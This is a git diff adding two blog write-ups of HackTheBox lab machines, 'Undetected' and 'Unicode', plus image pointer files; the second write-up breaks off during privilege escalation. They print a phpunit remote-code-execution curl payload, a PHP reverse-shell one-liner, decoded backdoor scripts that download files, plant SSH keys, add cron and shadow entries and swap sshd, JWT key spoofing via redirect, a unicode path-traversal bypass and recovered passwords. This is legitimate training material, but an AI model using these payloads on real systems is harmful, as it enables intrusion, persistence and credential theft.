@@ -0,0 +1,167 @@
+---
+title: "Writeup - Undetected (HTB)"
+date: 2022-04-09
+slug: "writeup-undetected-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Undectected](https://app.hackthebox.com/machines/Undetected) machine from  the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV 10.10.11.146
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+![](img/image-2.webp)
+
+## Exploit
+
+While going on the site I notice that there is a subdomain, so I add it in the /etc/hosts file:
+
+
+```bash
+10.10.11.146 store.djewelry.htb
+```
+![](img/image-3.webp)
+
+I arrive on a new part of the site : the store. I start by searching for a folder with gobuster :
+
+
+```bash
+gobuster dir -u http://store.djewelry.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
+```
+I quickly find the "/vendor" folder:
+
+![](img/image-4.webp)
+
+A lot of potential exploit... After some research I find that this version of "phpunit" has an exploit allowing to execute remote commands via PHP ([CVE-2017-9841](https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263)).
+
+
+```bash
+┌──(kali㉿kali)-[~]
+└─$ curl --data "<?php system('id');?>" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+So I will be able to use this exploit to create a reverse shell. To do this I open a port with "nc", then I use the following command to start the session:
+
+
+```bash
+curl --data '<?php $sock=fsockopen("10.10.14.20",1234);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
+
+```
+I now have a reverse shell. I'll do a first scan with [linPeas](lingeas.sh). After some analysis, I find a suspicious file in the "/var/backups" folder. After retrieving the file on my PC, I extract the information with the "strings" command.
+
+In the result of the command I find a large hexadecimal character string that I decipher with the site [Hex decode](https://www.convertstring.com/EncodeDecode/HexDecode).
+
+![](img/image-5.webp)
+
+It is a sequence of commands:
+
+
+```bash
+wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; 
+wget tempfiles.xyz/.main -O /var/lib/.main; 
+chmod 755 /var/lib/.main; 
+echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; 
+awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; 
+do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt;
+```
+One element is of particular interest to us, the hash of a user's password. I retrieve it and try to crack it with "john".
+
+![](img/image-6.webp)
+
+After a few seconds john finds the password: ihatehackers.
+
+We don't have the user name, but during the linPeas scan, I found that there were 2 users besides root: steven & steven1.
+
+Let's try with the two users:
+
+![](img/image-7.webp)
+
+So this is the password of steven1! I now have access to the first flag of the machine.
+
+## Privilege escalation
+
+Let's go back to our LinPeas scan. I noticed that the user steven had a mail in the folder "/var/mail" :
+
+![](img/image-8.webp)
+
+Globally the sysadmin tells us that there is a problem with apache, let's go and see in the apache folder if we notice any unusual elements.
+
+In the molules folder, there are a lot of elements, but when I look at the modification dates, I notice that they have the same date except one : mod\_reader.so.
+
+
+```bash
+ls -l /usr/lib/apache/modules
+```
+![](img/image-9.webp)
+
+I get the file on my computer and get the information with the command "strings". And as usual there is a big string, but this time in base64. I decrypt it with the following command :
+
+
+```bash
+┌──(kali㉿kali)-[~/Downloads]
+└─$ echo "d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk" | base64 -d
+wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd
+```
+These are 2 commands that use the program "sshd", so I get the ssdh file for analysis with ghidra.
+
+After the analysis of ghidra, I look if there are not unusual variables or functions. And I find a function that attracts my attention: auth\_password.
+
+In this function I find the backdoor's signature and a sequence of hexadecimal characters composing a password. Let's try to recompose the password!
+
+![](img/image-10.webp)
+
+At first I put back in order the password bits. I notice that the first byte is negative, but when I right click on the value, ghidra tells me that it corresponds to "0xa5".
+
+
+```bash
+30_1	0xa5
+28_2	0xa9f4
+24_4	0xbcf0b5e3
+16_8	0xb2d6f4a0fda0b3d6
+12_4	0xfdb3d6e7
+8_4	0xf7bbfdc8
+4_4	0xa4b3a3f3
+0_4	0xf0e7abd6
+```
+ In total, I find that it corresponds to 31 bytes, it's a good sign it's the size of the "backdoor" variable!
+
+I notice that at the end of the processing the following calculation is done: "\*pbVar4 = bVar7 ^ 0x96". This corresponds to an XOR with the value 96.
+
+I have all the elements, so I should be able to find the password with the help of [CyberChef](https://gchq.github.io/CyberChef). I add the following modules:
+
+- Swap endianness -> 31 word length
+- From Hex
+- XOR -> key : 96
+
+{{< alert icon="circle-info" >}}
+The "Swap endianness" function allows to convert little endian and big endian (or vice versa). These are two possibilities to store information.At the end cyberchef returns the following string:
+{{< /alert >}}
+
+```bash
+@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3
+```
+Let's try to connect to root with this password:
+
+![](img/image-11.webp)
+
+And it works, so I can get the last flag.
+
+## Recommendations
+
+To patch this host I think it would be necessary to perform a number of actions:
+
+- Mettre a jour phpunit pour la dernière version
+- Do not leave files with hashes visible to everyone / use stronger passwords
+- Use key authentication for ssh root connection
diff --git a/content/writeup-ctf/writeup-unicode-htb/featured.png b/content/writeup-ctf/writeup-unicode-htb/featured.png
new file mode 100644
index 0000000..8efb15a
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/featured.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1424deefc3bd5a9009ecb5bc81aea80fe2d4c22d4b8733dc09a5461375a6a664
+size 263343
diff --git a/content/writeup-ctf/writeup-unicode-htb/featured.webp b/content/writeup-ctf/writeup-unicode-htb/featured.webp
new file mode 100644
index 0000000..5dc5c0f
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/featured.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ca991bf1154421894698236d46037e0fde2983ce131f7dd695acebe1cda306aa
+size 26162
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-1.png b/content/writeup-ctf/writeup-unicode-htb/img/image-1.png
new file mode 100644
index 0000000..3fdd68d
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-1.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b13cc401f297db1292816f1ee790ed7490daf2bd1d0860e0b9dfece950f0a251
+size 35330
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp
new file mode 100644
index 0000000..c4feca0
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:3e798a235addfd1b574b46baafa279c7ae599ad243d54df0f2f089bb2129f5b3
+size 33810
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-10.png b/content/writeup-ctf/writeup-unicode-htb/img/image-10.png
new file mode 100644
index 0000000..2cda667
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-10.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:316870d53eab1c429a6483822119761aefd0c097996615147dbd2a3ebbbccd8a
+size 135430
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp
new file mode 100644
index 0000000..a801d49
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:7f65102bfaaf059e3cf21efb9461748221431f51c25e7ed30bccb7a8e0b974db
+size 107204
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-11.png b/content/writeup-ctf/writeup-unicode-htb/img/image-11.png
new file mode 100644
index 0000000..62a895d
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-11.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:503b7cbd2e7330b1b85deebaa72e4875841da6b88439b0489ca651044643bd35
+size 98261
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp
new file mode 100644
index 0000000..bbbb292
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:a787f6525e92debcedcc5448cf323be5fe0598866820429f0a356a140feef8bd
+size 47326
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-12.png b/content/writeup-ctf/writeup-unicode-htb/img/image-12.png
new file mode 100644
index 0000000..31bf304
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-12.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:79f87fceac5cd639928f5e75ffa5588c74c3d5ba5d3d1c70b68b38fff9aef0e4
+size 67086
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp
new file mode 100644
index 0000000..8a32ed4
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:269b68043e8e00df762c13d267d86986dbcf041284cc25d6d440f6922f991e11
+size 83128
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-13.png b/content/writeup-ctf/writeup-unicode-htb/img/image-13.png
new file mode 100644
index 0000000..b6734ae
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-13.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d785161f7afa040a36a3892661c4280d6a44d2c2af1aec5ffb968f730af11490
+size 13953
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp
new file mode 100644
index 0000000..a7268d7
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:ade238fb0e2da475cb4208fd7416de4104344cc4b99a3eb0a731d1a1e8ffdb79
+size 16720
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-14.png b/content/writeup-ctf/writeup-unicode-htb/img/image-14.png
new file mode 100644
index 0000000..fbcdd39
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-14.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:4acd80930d98b07e04b0b56784fa9749dbbf0ba4c9b77707851a34f5d9d1c1a7
+size 32401
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp
new file mode 100644
index 0000000..7727282
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:42eec09f9d8c38879986a1b3b5e5ed8108ca59f9756a45133beb1a0c90f49e6a
+size 30716
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-15.png b/content/writeup-ctf/writeup-unicode-htb/img/image-15.png
new file mode 100644
index 0000000..395a0c0
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-15.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:1a2558b2eb5f6c7dfce8c053a44347cbee78700b0e48a099904daa842b287e04
+size 10139
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp
new file mode 100644
index 0000000..6467a50
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:110cd0b17edc1d7602c1b98feab040dac79b1d83f743d31aa879f7e426c7add8
+size 11012
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-16.png b/content/writeup-ctf/writeup-unicode-htb/img/image-16.png
new file mode 100644
index 0000000..0004754
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-16.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e873cf88988cd26bb853ddd493a140bedfc3d27584fad2cc47ba5bafff2da729
+size 46992
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp
new file mode 100644
index 0000000..e503d18
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:b0cf756d4794ed6c556d1f35af8414290055a305ec27dc86d4d62b1aedf1ba5c
+size 67160
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-17.png b/content/writeup-ctf/writeup-unicode-htb/img/image-17.png
new file mode 100644
index 0000000..819a6cd
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-17.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:55a5493a3d30da7ec55c1773bd95ebec52c0c143b73334c43576cd68056bb2e1
+size 22349
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp
new file mode 100644
index 0000000..f7c77c8
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:cdb91355291c96759130d44558ddaa6ceaa6cd18b6a49c81f98d0ef85b6f1c2a
+size 34580
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-2.png b/content/writeup-ctf/writeup-unicode-htb/img/image-2.png
new file mode 100644
index 0000000..6402cdb
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-2.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:27fdd71979f347374b853d1f2fdde8c7471ca7682b6008aec987696173f3c676
+size 105639
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp
new file mode 100644
index 0000000..67380ca
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:947f486482d5adeddfe69866b87a536253921760c18067a56379f8da1eb31e92
+size 18530
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-3.png b/content/writeup-ctf/writeup-unicode-htb/img/image-3.png
new file mode 100644
index 0000000..4c4f05e
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-3.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:70b725e86365fb7749186d4da8ed8be2cf1a5fedb472894d985e879f6d1599bc
+size 46676
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp
new file mode 100644
index 0000000..56f2a10
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5b630a6cb9da2408661d9fbe313f31bb87c0387587c63181185b79c6f3bfc93f
+size 13884
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-4.png b/content/writeup-ctf/writeup-unicode-htb/img/image-4.png
new file mode 100644
index 0000000..56b9698
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-4.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:f0095690937b8a93eb85b010030039505185fd63b9cd85926a7d92234effcfcc
+size 139343
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp
new file mode 100644
index 0000000..8777883
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:34dff53eb88d134ede9bb059379c294dba27770c049b4c4065eba4d0ba329a0d
+size 60650
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-5.png b/content/writeup-ctf/writeup-unicode-htb/img/image-5.png
new file mode 100644
index 0000000..44698cb
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-5.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e47405783afbe203ef272aedc5a8492cae640b077d380a728c30a29392f23fdf
+size 42414
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp
new file mode 100644
index 0000000..9f7bd3e
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:073d4e30b98e53f70eec7320002834be78f6509868427b5e08eb034bb9ebb2d7
+size 15022
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-6.png b/content/writeup-ctf/writeup-unicode-htb/img/image-6.png
new file mode 100644
index 0000000..275b8a2
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-6.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:d7de92b0a59ba688c0c5fd2e803e09403f6d49a3e0f49970448ac1e95d12dea7
+size 2830
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp
new file mode 100644
index 0000000..5f80472
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:5e95a319a4ce81a430f4afdba3143e18c68b737b898cba5eba4a20cdd529abe2
+size 2064
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-7.png b/content/writeup-ctf/writeup-unicode-htb/img/image-7.png
new file mode 100644
index 0000000..634d5b6
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-7.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:6b9bd0096ac96e7b35323194368a0b53e1aaa562f42b7a645226380ba4518884
+size 117685
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp
new file mode 100644
index 0000000..de75f51
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:dca94e3abf286ab940a31dd9e3c0cd4839e4ffa2f7610520c8331f985d0ecb56
+size 92474
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-8.png b/content/writeup-ctf/writeup-unicode-htb/img/image-8.png
new file mode 100644
index 0000000..1739068
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-8.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:88e61709c2642b5ea5f29aba65ece391ff71ae4870e06e2443907dfa8114e186
+size 24417
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp
new file mode 100644
index 0000000..a9e6cfd
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:c03e1f0ef1b66ae13c5fb1adad147e4d3507dcd0a9983e586340044cd1627f1d
+size 29608
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-9.png b/content/writeup-ctf/writeup-unicode-htb/img/image-9.png
new file mode 100644
index 0000000..9d320a2
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-9.png
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:2f62a01de7f9328e336bdf2ad03b381542194d03be2d159f9d9166b767c882d7
+size 277841
diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp
new file mode 100644
index 0000000..0914410
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/img/image-9.webp
@@ -0,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:e5b838c3796fea279b61d6eb1f1078bbb0cc240689c93603051ff64812829787
+size 162568
diff --git a/content/writeup-ctf/writeup-unicode-htb/index.md b/content/writeup-ctf/writeup-unicode-htb/index.md
new file mode 100644
index 0000000..e8cdec4
--- /dev/null
+++ b/content/writeup-ctf/writeup-unicode-htb/index.md
@@ -0,0 +1,235 @@
+---
+title: "Writeup - Unicode (HTB)"
+date: 2022-05-07
+slug: "writeup-unicode-htb"
+type: "writeup-ctf"
+--- 
+
+This is a writeup for the [Unicode](https://app.hackthebox.com/machines/Unicode) machine from the HackTheBox site.
+
+## Enumeration
+
+First, let's start with a scan of our target with the following command:
+
+
+```bash
+nmap -sV -T4 -Pn 10.10.11.126
+```
+Two TCP ports are discovered:
+
+![](img/image-1.webp)
+
+- 22/tcp : SSH port (OpenSSH 8.2)
+- 80/tcp : HTTP web server (Apache 2.4.41)
+
+![](img/image-2.webp)
+
+## Exploit
+
+Let's start by creating an account on the site.
+
+![](img/image-3.webp)
+
+After logging in, you will be taken to the page.
+
+![](img/image-4.webp)
+
+By searching a bit you can find a lot of forms, file sending, ... But after having tested them I don't find anything conclusive.
+
+![](img/image-5.webp)
+
+![](img/image-6.webp)
+
+Looking at the cookies generated by the site, I find one: `auth` I try to decode it on JWT.io.
+
+![](img/image-7.webp)
+
+So it's a JWT cookie with the RS256 algorithm. I search on google for documentation on this type of cookie and see if there are any exploit. I quickly find the following site: [JWT - JSON Web Tokens](https://hackernoon.com/json-web-tokens-jwt-demystified-f7e202249640).
+
+In this article we learn that this string is composed of 3 parts encoded in base 64 :
+
+![](img/image-8.webp)
+
+- Header: Parameter such as the algorithm, the url of the JSON web key, ...
+- Payload: Personalized storage area, in our case the username
+- Signature : Hash of the Header+Payload
+
+We also learn that in the majority of the cases we use asymmetric keys and that in this case the site must host a `jwks` file with the `keys` properties. I can get the content of this file with the following command:
+
+
+```bash
+┌──(d3vyce㉿kali)-[~/Documents]
+└─$ curl hackmedia.htb/static/jwks.json                                                                   
+{
+    "keys": [
+        {
+            "kty": "RSA",
+            "use": "sig",
+            "kid": "hackthebox",
+            "alg": "RS256",
+            "n": "AMVcGPF62MA_lnClN4Z6WNCXZHbPYr-dhkiuE2kBaEPYYclRFDa24a-AqVY5RR2NisEP25wdHqHmGhm3Tde2xFKFzizVTxxTOy0OtoH09SGuyl_uFZI0vQMLXJtHZuy_YRWhxTSzp3bTeFZBHC3bju-UxiJZNPQq3PMMC8oTKQs5o-bjnYGi3tmTgzJrTbFkQJKltWC8XIhc5MAWUGcoI4q9DUnPj_qzsDjMBGoW1N5QtnU91jurva9SJcN0jb7aYo2vlP1JTurNBtwBMBU99CyXZ5iRJLExxgUNsDBF_DswJoOxs7CAVC5FjIqhb1tRTy3afMWsmGqw8HiUA2WFYcs",
+            "e": "AQAB"
+        }
+    ]
+}
+```
+At the end of the article we learn one last thing, in general this element is stored in the `header` of the page. But in our case it is in the form of a `cookie`.
+
+To change the account for the admin account, we will try to do a `JWKS Spoofing`. To do this we will first generate a key pair following the same parameters as the `jwks.json` file we found. For that I use the following site [mkjwk](https://mkjwk.org/).
+
+![](img/image-9.webp)
+
+I then create a `jwks.json` file with the same structure as the previous one but with the `n` we just generated.
+
+
+```bash
+{
+    "keys": [
+        {
+            "kty": "RSA",
+            "use": "sig",
+            "kid": "hackthebox",
+            "alg": "RS256",
+            "n": "[CHANGE IT]",
+            "e": "AQAB"
+        }
+    ]
+}
+```
+I then launch a file server with the following command:
+
+
+```bash
+python3 -m http.server 80
+```
+Then I start to modify our cookie. First I change the value of `jku` and add the following element:
+
+
+```bash
+/../redirect?url=10.10.14.4/jwks.json
+```
+Then I add in the `Verify Signature` part the Public/Private key that we have generated.
+
+Finally I change the variable `user` with the value `admin`.
+
+![](img/image-10.webp)
+
+Now that we have our new cookie, I replace the old value with the new one, then refresh the page. I now have access to the admin interface!
+
+![](img/image-11.webp)
+
+I look a little at the different parge, I fall on the following link:
+
+<http://10.10.11.126/display/?page=monthly.pdf>
+
+It's a link that has an argument, so we should be able to do a Path Traversal exploit. So I try in a first time the following input:
+
+
+```bash
+../../../etc/passwd
+```
+But unfortunately this results in an error... There is a check that blocks our request. After some research it is known that it is possible to bypass this filtering with a particular encoding of the characters. Thanks to the unicode normalization it is possible to pass the request:
+
+[Unicode normalization vulnerabilities](https://lazarv.com/posts/unicode-normalization-vulnerabilities/)
+
+With the following query I can access the file :
+
+
+```bash
+︰/︰/︰/︰/︰/︰/︰/etc/passwd
+```
+In this file I learn that the `mysql` service is used. Potentially credentials !
+
+
+```bash
+root:x:0:0:root:/root:/bin/bash 
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
+bin:x:2:2:bin:/bin:/usr/sbin/nologin 
+sys:x:3:3:sys:/dev:/usr/sbin/nologin 
+sync:x:4:65534:sync:/bin:/bin/sync 
+games:x:5:60:games:/usr/games:/usr/sbin/nologin 
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin 
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin 
+systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin 
+messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin 
+tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false 
+uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin 
+tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin 
+landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin 
+pollinate:x:110:1::/var/cache/pollinate:/bin/false 
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin 
+sshd:x:112:65534::/run/sshd:/usr/sbin/nologin systemd-
+coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin 
+lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false 
+mysql:x:113:117:MySQL Server,,,:/nonexistent:/bin/false 
+code:x:1000:1000:,,,:/home/code:/bin/bash 
+```
+I then look in the configuration files of nginx, which allows me to find the following file:
+
+
+```bash
+mysql_host: "localhost" 
+mysql_user: "code" 
+mysql_password: "B3stC0d3r2021@@!" 
+mysql_db: "user" 
+```
+I then try to connect with these credentials:
+
+![](img/image-12.webp)
+
+I now have a shell as `code` and I can get the first flag.
+
+## Privilege escalation
+
+First I look at the sudo permissions I have:
+
+![](img/image-13.webp)
+
+I have the right to run the treport `treport` script as root, so I try to run it to see what it does:
+
+![](img/image-14.webp)
+
+This script allows to manage files. One option interests me particularly: `Download A Threat Report`. Indeed after having executed it, we can clearly see that the program uses `curl`. So I try to download a local file to see what happens:
+
+![](img/image-15.webp)
+
+An error, so there is potentially a validation of the URL... So I look at the doc of the command to see if there is an option that could be useful.
+
+
+```bash
+[...]
+-K, --config <file>
+
+Specify a text file to read curl arguments from. The command line arguments found in the text file will be used as if they were provided on the command line.
+[...]
+```
+After a few minutes I find the option `-K`, this option allows to specify a file in which `curl` will go to look for the links to download files. I can try to use this option to see the content of the file...
+
+![](img/image-16.webp)
+
